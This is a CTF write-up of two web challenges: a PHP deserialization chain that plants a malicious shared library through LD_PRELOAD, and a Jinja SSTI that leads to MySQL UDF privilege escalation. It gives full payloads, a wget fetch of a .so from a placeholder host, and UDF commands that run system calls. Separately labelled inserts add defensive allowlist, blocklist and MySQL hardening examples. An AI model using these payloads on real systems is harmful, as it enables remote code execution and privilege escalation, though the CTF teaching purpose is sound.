
i春秋 Summer Competition WP

ICHUNQIU CTF

Hijack

This deserialization challenge is fairly simple; it clearly wants you to load a library via LD_PRELOAD.

Straight to the code:

<?php
highlight_file(__FILE__);
class ENV{
    public $key;
    public $value;
    public $math;
}
class DIFF{
    public $callback;
    public $back;
    private $flag;
}

class FILE{
    public $filename;
    public $enviroment;
}
class FUN{
    public $fun;
    public $value;
    // wakeup -> diff -> FUN get -> call -> path
    // wakeup -> diff -> FILE get -> tostring -> change env var LD_PRELOAD=$FLAG
}

// First write the .so file and read back the path it gets moved to
// Then set the env var LD_PRELOAD=/tmp/5cce5f9d798d93f79681633aba2a8b52.so
// $a=new ENV();
// $a->math=new DIFF();
// $a->math->callback=new FUN();
// $a->math->callback->value="base64-encoded string of the compiled .so file";
// $a->math->callback->fun=new FILE();
// $a->math->callback->fun->filename="hook.so";
// // flag{fake_flag_really_flag_require_you_rce!!!!} 文件成功移动到/tmp/a2767d81ce28fa0998a0012d879f8822.soYou are stupid, what exactly is your identity?YesYesYes
// // ///tmp/7e65038e1e1894eebdbf134abc4015d1.so
// // //tmp/5cce5f9d798d93f79681633aba2a8b52.so
// echo urlencode(serialize($a));

$a=new ENV(); // WAKEUP -> DIFF ISSET GET -> FILE TOSTRING -> ENV
$b=new ENV();
$b->key="LD_PRELOAD";
$b->value="/tmp/4382cb097e6f5dbc6145ca94978305a4.so";
$a->math=new DIFF();
$a->math->callback=new FILE();
$a->math->callback->enviroment=$b;
///tmp/7e65038e1e1894eebdbf134abc4015d1.so
echo urlencode(serialize($a));
// O%3A3%3A%22ENV%22%3A3%3A%7Bs%3A3%3A%22key%22%3Bs%3A10%3A%22LD_PRELOAD%22%3Bs%3A5%3A%22value%22%3Bs%3A40%3A%22%2Ftmp%2Ff92346398d68a5caa62d91f0cec48d15.so%22%3Bs%3A4%3A%22math%22%3BO%3A4%3A%22DIFF%22%3A3%3A%7Bs%3A8%3A%22callback%22%3BO%3A4%3A%22FILE%22%3A2%3A%7Bs%3A8%3A%22filename%22%3BN%3Bs%3A10%3A%22enviroment%22%3BO%3A3%3A%22ENV%22%3A3%3A%7Bs%3A3%3A%22key%22%3Bs%3A10%3A%22LD_PRELOAD%22%3Bs%3A5%3A%22value%22%3Bs%3A40%3A%22%2Ftmp%2Ff92346398d68a5caa62d91f0cec48d15.so%22%3Bs%3A4%3A%22math%22%3BN%3B%7D%7Ds%3A4%3A%22back%22%3BN%3Bs%3A10%3A%22%00DIFF%00flag%22%3BN%3B%7D%7D
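The chain above works because user-supplied serialized data is allowed to instantiate arbitrary application classes and, through them, to choose the name of an environment variable. The following is an added example, not code from the writeup or the challenge, showing the defensive counterpart a PHP application would apply: an allowlist on the classes a payload may contain (enforced both by a pre-check and by `unserialize()`'s `allowed_classes` option) and a guard in front of `putenv()` that refuses loader-controlled keys such as LD_PRELOAD. The function names, the allowlist, and the sample payloads are assumptions for illustration.

```php
<?php
// Added example, not code from the writeup or the challenge: a defensive
// counterpart to the ENV/DIFF/FILE gadget chain above. Function names,
// the allowlist and the sample payloads are assumptions for illustration.

// Environment keys that must never be chosen by user data: the dynamic loader
// honours them on the next process start, which is the whole LD_PRELOAD route.
const FORBIDDEN_ENV_KEYS = ['LD_PRELOAD', 'LD_LIBRARY_PATH', 'LD_AUDIT'];

// Class names that unserialize() would instantiate, read off the wire format
// (O:<len>:"<Name>": for objects, C:<len>:"<Name>": for Serializable classes).
function serialized_class_names(string $data): array {
    preg_match_all('/[OC]:\d+:"([^"]+)"/', $data, $m);
    return array_values(array_unique($m[1]));
}

// Primary control: every class in the payload must be on the allowlist.
// Secondary control: no forbidden env key anywhere in the payload.
// Returns a list of rejection reasons; an empty list means the payload is acceptable.
function audit_serialized(string $data, array $allowed): array {
    $reasons = [];
    foreach (serialized_class_names($data) as $cls) {
        if (!in_array($cls, $allowed, true)) {
            $reasons[] = "unexpected class in payload: $cls";
        }
    }
    foreach (FORBIDDEN_ENV_KEYS as $key) {
        if (stripos($data, $key) !== false) {
            $reasons[] = "payload references forbidden environment key: $key";
        }
    }
    return $reasons;
}

// Audit first, then let PHP enforce the same allowlist: with allowed_classes set,
// any other class becomes __PHP_Incomplete_Class, so no __wakeup/__destruct/__toString
// of an application class can ever run from untrusted input.
function safe_unserialize(string $data, array $allowed) {
    $reasons = audit_serialized($data, $allowed);
    if ($reasons !== []) {
        throw new InvalidArgumentException(implode('; ', $reasons));
    }
    return unserialize($data, ['allowed_classes' => $allowed]);
}

// Guard for any code path that ends in putenv(): the key must look like a normal
// variable name and must not be one the dynamic loader reads.
function safe_putenv(string $key, string $value): bool {
    if (!preg_match('/^[A-Za-z_][A-Za-z0-9_]*$/', $key)
        || in_array(strtoupper($key), FORBIDDEN_ENV_KEYS, true)) {
        return false;
    }
    return putenv("$key=$value");
}

// Constructed sample inputs (not captured traffic): a shortened gadget payload in
// the shape of the writeup's, and a plain array that a real feature might accept.
$gadget = 'O:3:"ENV":3:{s:3:"key";s:10:"LD_PRELOAD";s:5:"value";s:12:"/tmp/evil.so";'
        . 's:4:"math";O:4:"DIFF":3:{s:8:"callback";N;s:4:"back";N;s:10:"' . "\0DIFF\0flag" . '";N;}}';
$benign = 'a:2:{s:4:"name";s:5:"alice";s:4:"role";s:6:"viewer";}';

print_r(audit_serialized($gadget, []));          // lists ENV, DIFF and the LD_PRELOAD hit
var_dump(safe_unserialize($benign, []));          // plain array, no classes needed
var_dump(safe_putenv('LD_PRELOAD', '/tmp/evil.so')); // refused by the key guard
```

The substring scan for loader keys is only a second line of defence; the control that actually closes the chain is the class allowlist, because none of ENV, DIFF, FILE or FUN can be built from user input once `allowed_classes` is restricted, so their magic methods never fire. Where an application genuinely needs structured input from users, JSON with explicit validation avoids the problem entirely.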

With LD_PRELOAD, each time you have to find which function the process calls in order to build the .so; is there a universal .so?

At first I built one that just ran whoami and found it wasn't usable; what I used here was the .so idea from the earlier 虎符CTF, writing PHP code to read the flag.

https://fushuling.com/index.php/2022/03/21/%E4%BB%8E%E8%99%8E%E7%AC%A6ctf-ezphp%E6%B5%85%E8%B0%88%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F%E6%B3%A8%E5%85%A5%E4%B8%8Elinux%E4%B8%B4%E6%97%B6%E6%96%87%E4%BB%B6%E5%88%A9%E7%94%A8/

I can't find the article on a universal .so that I saw before, and when I tried it, compiling and running it didn't succeed; refer to the one above instead. Competitions generally don't use many commands.

https://www.sakura501.top/2022/04/28/hua-shi-gou-zao-e-yi-so-wen-jian/

brother

At first glance the parameter is passed via name. I checked and it's not SQL; tried it and it's SSTI.

/?name={{''.__class__.__base__.__subclasses__()[133].__init__.__globals__['popen']('ps aux').read()}}

There's a MySQL service, plus python3, java and the like.

secure_file_priv is not enabled; --skip-grant-tables

UDF privilege escalation

The current MySQL user, ctf, has the privileges.

searchsploit mysql udf
searchsploit mysql udf -m 1518
cat 1518.c
gcc -g -c 1518.c -fPIC
gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.o -lc
wget xxx/1518.so

# It's suggested to put the source on the target and compile there, to avoid problems from differing build environments, so wget it first
CREATE TABLE foo(line blob);
insert into foo values(load_file('/tmp/1518.so'));
mysql -uctf -p123456 -Dmysql -e "show variables like '%plugin%';";
select * from mysql.func;
select do_system('chmod 777 /flag');

Later I also saw a way of writing it in directly, which works too.

show global variables like '%secure_file_priv%';
show variables like '%plugin%';
select * from func;
select unhex('hex content of the .so written directly here') into dumpfile '/usr/lib/mysql/plugin/mysqludf.so';
create function sys_eval returns string soname 'mysqludf.so';
select sys_eval('whoami');
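Both UDF routes above depend on two server settings the writeup notes: an empty secure_file_priv (so LOAD_FILE() and INTO DUMPFILE can reach the plugin directory) and --skip-grant-tables (so no privilege check stands in the way). The following is an added example, not from the writeup, showing the weak MySQL option-file fragment next to the hardened one; the directory paths are assumptions, and the two [mysqld] sections are meant as two alternative files, not one file.

```ini
# Added example, not from the writeup: the server settings behind the UDF route,
# weak form versus hardened form. Directory paths are assumptions.

# --- weak: what the writeup's steps rely on ---
[mysqld]
secure_file_priv = ""        # empty: LOAD_FILE()/INTO DUMPFILE may read or write anywhere
                             # the server process can, including plugin_dir
skip-grant-tables            # privilege system off: every connection is effectively root

# --- hardened ---
[mysqld]
secure_file_priv = /var/lib/mysql-files   # confine server-side file I/O to one directory
                                          # (or NULL to disable LOAD_FILE/DUMPFILE entirely)
# skip-grant-tables is deliberately absent; if it was enabled for a password reset,
# remove it and restart once the reset is done
plugin_dir = /usr/lib/mysql/plugin        # must be owned by root and not writable by the mysql OS user
```

Two checks go with the hardened form. `SHOW VARIABLES LIKE 'secure_file_priv'` should report the confined directory rather than an empty string, and `SELECT * FROM mysql.func` should list only functions an administrator installed on purpose; an unexpected row pointing at a .so in plugin_dir is the artefact both routes leave behind. Application accounts such as the writeup's ctf user should not hold the FILE privilege or INSERT on the mysql schema, since those are what turn a SQL injection or a leaked password into a library load.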

2024 春秋杯 Cybersecurity League Summer Competition WP (web) (qq.com)

2024 春秋杯 Cybersecurity League Summer Competition, Web track, solutions WriteUp (partial) - CSDN blog